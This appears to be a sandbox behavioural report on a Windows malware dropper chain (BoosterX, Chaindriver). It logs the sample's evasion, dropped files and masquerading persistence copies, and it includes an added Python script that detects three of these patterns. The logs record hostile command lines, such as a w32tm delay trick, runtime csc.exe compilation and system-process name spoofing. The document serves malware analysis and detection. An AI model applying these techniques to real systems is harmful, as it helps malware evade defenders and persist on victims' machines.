                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
                          Source: C:\Chaindriver.exe | Memory allocated: C80000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: 1ACC0000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: F40000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: 1AD50000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: AA0000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: 1A420000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exe | Memory allocated: E40000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exe | Memory allocated: 1A920000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exe | Memory allocated: EA0000 memory reserve | memory write watch
                          Source: C:\Recovery\Memory Compression.exe | Memory allocated: 1A9D0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Memory allocated: 10C0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Memory allocated: 1ACD0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Memory allocated: 1020000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: F10000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Memory allocated: 1A700000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Memory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Memory allocated: 1AD10000 memory reserve | memory write watch
                          Source: C:\Chaindriver.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\KGIrVxyv.log
                          Source: C:\Chaindriver.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\Zfmnrnxn.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\libcrypto-1_1.dll
                          Source: C:\Recovery\Memory Compression.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\FnBzuKhI.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_lzma.pyd
                          Source: C:\Chaindriver.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\PxTXHLsG.log
                          Source: C:\Chaindriver.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\viEjRGTv.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\unicodedata.pyd
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_bz2.pyd
                          Source: C:\Chaindriver.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\HTKiXRcY.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_decimal.pyd
                          Source: C:\Recovery\Memory Compression.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\TkRgFrOc.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_hashlib.pyd
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\python39.dll
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\select.pyd
                          Source: C:\Recovery\Memory Compression.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\BXpblVtN.log
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75042\_socket.pyd
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Check user administrative privileges: GetTokenInformation
                          Source: C:\Chaindriver.exe TID: 7876 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Chaindriver.exe TID: 7648 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Chaindriver.exe TID: 7620 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7656 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7592 | Thread sleep time: -30000s >= -30000s
                          Source: C:\Recovery\Memory Compression.exe TID: 7528 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 7532 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 7660 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Chaindriver.exe TID: 3288 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe TID: 8048 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Chaindriver.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Recovery\Memory Compression.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | File Volume queried: C:\ FullSizeInformation
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652ED8D00 FindFirstFileExW,FindClose,0_2_00007FF652ED8D00
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EE8670 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EF26C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF652EF26C4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C036407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C036407C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C038FC20 FindFirstFileExA,4_2_00007FF6C038FC20
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B5B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B4407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,7_2_00007FF720B4407C
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B6FC20 FindFirstFileExA,7_2_00007FF720B6FC20
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C0381624 VirtualQuery,GetSystemInfo,4_2_00007FF6C0381624
                          Source: C:\Chaindriver.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\Memory Compression.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user\Documents\desktop.ini
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user\AppData
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user\AppData\Local\Temp
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Chaindriver.exe | File opened: C:\Users\user\AppData\Local
                          Source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B2A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
                          Source: BoosterX.exe, 00000004.00000002.1672861677.000002A14FAE6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: War&Prod_VMware_SATA
                          Source: Chaindriver.exe, 00000008.00000002.1726550758.0000000000D5A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: Chaindriver.exe, 00000008.00000002.1743974860.000000001BE0B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                          Source: w32tm.exe, 0000002F.00000002.1875107794.000001CB2D4B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                          Source: Memory Compression.exe, 00000025.00000002.1832528116.000000001B36F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                          Source: w32tm.exe, 00000021.00000002.1778436522.0000021A6C407000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
                          Source: C:\Chaindriver.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EEB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EEB3CC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EF42D0 GetProcessHeap,0_2_00007FF652EF42D0
                          Source: C:\Chaindriver.exe | Process token adjusted: Debug
                          Source: C:\Recovery\Memory Compression.exe | Process token adjusted: Debug
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe | Process token adjusted: Debug
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EEB3CC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EEB3CC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EDCA9C SetUnhandledExceptionFilter,0_2_00007FF652EDCA9C
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EDC030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF652EDC030
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EDC8BC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF652EDC8BC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 1_2_00007FFE148BFF4C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFE148BFF4C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C03832D4 SetUnhandledExceptionFilter,4_2_00007FF6C03832D4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C0382490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF6C0382490
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C0387658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6C0387658
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C03830F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6C03830F0
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B632D4 SetUnhandledExceptionFilter,7_2_00007FF720B632D4
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B62490 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00007FF720B62490
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B67658 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF720B67658
                          Source: C:\Chaindriver.sfx.exe | Code function: 7_2_00007FF720B630F0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00007FF720B630F0
                          Source: C:\Chaindriver.exe | Memory allocated: page read and write | page guard
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: 4_2_00007FF6C037B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C037B110
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Process created: C:\Users\user\Desktop\t8F7Ic986c.exe "C:\Users\user\Desktop\t8F7Ic986c.exe"
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe -p1234
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\1.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Chaindriver.sfx.exe Chaindriver.sfx.exe -p1234
Source: C:\Chaindriver.sfx.exe | Process created: C:\Chaindriver.exe "C:\Chaindriver.exe"
Source: C:\Chaindriver.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"
Source: C:\Chaindriver.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES953C.tmp" "c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMP"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: C:\Chaindriver.exe "C:\Chaindriver.exe"
Source: C:\Recovery\Memory Compression.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
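Added example, written for this report; it is not part of the Joe Sandbox output and not code from the sample. The process-creation entries above show three patterns worth turning into detections: cmd.exe running chcp 65001 and then w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 before relaunching Chaindriver.exe (w32tm takes its two samples five seconds apart, so the batch file gets a delay of about five seconds without calling timeout or ping); csc.exe compiling a .cmdline response file out of %TEMP% on behalf of Chaindriver.exe; and persistence copies that borrow Windows system-process names, such as C:\Recovery\Memory Compression.exe and C:\Users\Default\Pictures\RuntimeBroker.exe. The script replays constructed process-creation records modelled on those entries and applies the three rules. The record layout, the PIDs other than 7712, 7852 and 6924, the svchost.exe parent for the persistence copies, the two benign control events and the parent allowlist for csc.exe are assumptions.

```python
"""Replay constructed process-creation records and flag three patterns seen in
the report: w32tm used as a sleep before a relaunch, csc.exe compiling a
response file from %TEMP%, and system-process names running outside System32.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:            # hypothetical record layout (Sysmon EID 1 carries the same fields)
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


# Names of Windows components that should never run from user-writable paths.
# RuntimeBroker.exe and SecurityHealthSystray.exe live in System32; "Memory
# Compression" is a kernel-side system process with no on-disk executable.
SYSTEM_PROCESS_NAMES = {
    "runtimebroker.exe", "securityhealthsystray.exe", "memory compression.exe",
    "svchost.exe", "csrss.exe",
}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")  # subdirectories included
CSC_ALLOWED_PARENTS = {"devenv.exe", "msbuild.exe", "dotnet.exe", "vbcscompiler.exe"}  # assumed allowlist

W32TM_SLEEP = re.compile(r"w32tm\s+/stripchart\s+/computer:localhost", re.IGNORECASE)
CSC_TEMP_RSP = re.compile(r'@"?[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline', re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("/", "\\").rpartition("\\")[2].lower()


def dirname(path: str) -> str:
    head, sep, _ = path.replace("/", "\\").lower().rpartition("\\")
    return head + sep


def in_trusted_dir(path: str) -> bool:
    return dirname(path).startswith(TRUSTED_DIRS)


def detect(events: list[ProcEvent]) -> list[Finding]:
    findings: list[Finding] = []
    slept_shells: set[int] = set()   # cmd.exe PIDs that already ran the w32tm sleep
    for ev in events:
        name, parent = basename(ev.image), basename(ev.parent_image)

        # Rule 1a: cmd.exe polling localhost with w32tm /stripchart is a sleep primitive.
        if name == "w32tm.exe" and parent == "cmd.exe" and W32TM_SLEEP.search(ev.cmdline):
            slept_shells.add(ev.ppid)
            findings.append(Finding("w32tm_sleep", ev.pid, f"cmd.exe pid {ev.ppid} delays via {ev.cmdline!r}"))
        # Rule 1b: the same shell later starts a binary outside the Windows system directories.
        elif ev.ppid in slept_shells and not in_trusted_dir(ev.image):
            findings.append(Finding("delay_then_relaunch", ev.pid,
                                    f"{ev.image} started by cmd.exe pid {ev.ppid} after the w32tm sleep"))

        # Rule 2: runtime C# compile of a response file dropped under %TEMP%.
        if name == "csc.exe" and parent not in CSC_ALLOWED_PARENTS and CSC_TEMP_RSP.search(ev.cmdline):
            findings.append(Finding("runtime_csharp_compile", ev.pid, f"{parent} compiled a .cmdline file from %TEMP%"))

        # Rule 3: a Windows system-process name running from an untrusted directory.
        if name in SYSTEM_PROCESS_NAMES and not in_trusted_dir(ev.image):
            findings.append(Finding("system_name_outside_system32", ev.pid, f"{ev.image} borrows a system process name"))
    return findings


# Constructed records modelled on the report's process tree (PIDs 7712, 7852 and
# 6924 are the report's; the rest, and the svchost.exe parent, are assumed).
SAMPLE_EVENTS = [
    ProcEvent(7712, 7600, r"C:\Chaindriver.sfx.exe", r"C:\Chaindriver.exe", r'"C:\Chaindriver.exe"'),
    ProcEvent(8000, 7712, r"C:\Chaindriver.exe", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\fvh1uhfy\fvh1uhfy.cmdline"'),
    ProcEvent(8010, 7712, r"C:\Chaindriver.exe", r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lrFP7pOB0Z.bat"'),
    ProcEvent(8011, 8010, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\chcp.com", "chcp 65001"),
    ProcEvent(8012, 8010, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\w32tm.exe",
              "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    ProcEvent(7852, 8010, r"C:\Windows\System32\cmd.exe", r"C:\Chaindriver.exe", r'"C:\Chaindriver.exe"'),
    ProcEvent(6924, 900, r"C:\Windows\System32\svchost.exe", r"C:\Recovery\Memory Compression.exe",
              r'"C:\Recovery\Memory Compression.exe"'),
    ProcEvent(6930, 900, r"C:\Windows\System32\svchost.exe", r"C:\Users\Default\Pictures\RuntimeBroker.exe",
              r'"C:\Users\Default\Pictures\RuntimeBroker.exe"'),
    # benign controls: the real RuntimeBroker, and w32tm used for a status query
    ProcEvent(1200, 900, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\RuntimeBroker.exe",
              r"C:\Windows\System32\RuntimeBroker.exe -Embedding"),
    ProcEvent(1300, 1250, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\w32tm.exe", "w32tm /query /status"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

On real telemetry the same fields come from Sysmon Event ID 1 or an EDR process tree. The w32tm rule is meant to be paired with the relaunch rule rather than alerted on alone, since w32tm /stripchart is also a legitimate time-sync diagnostic; the csc.exe rule should be tuned to the build tooling actually present on the estate.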
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Code function: 0_2_00007FF652EFA620 cpuid
Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe | Code function: GetLocaleInfoW,GetNumberFormatW 4_2_00007FF6C037A24C
Source: C:\Chaindriver.sfx.exe | Code function: GetLocaleInfoW,GetNumberFormatW 7_2_00007FF720B5A24C
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformation (30 identical entries)
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\Desktop\t8F7Ic986c.exe VolumeInformation
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042 VolumeInformation (4 identical entries)
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\base_library.zip VolumeInformation
Source: C:\Users\user\Desktop\t8F7Ic986c.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe VolumeInformation
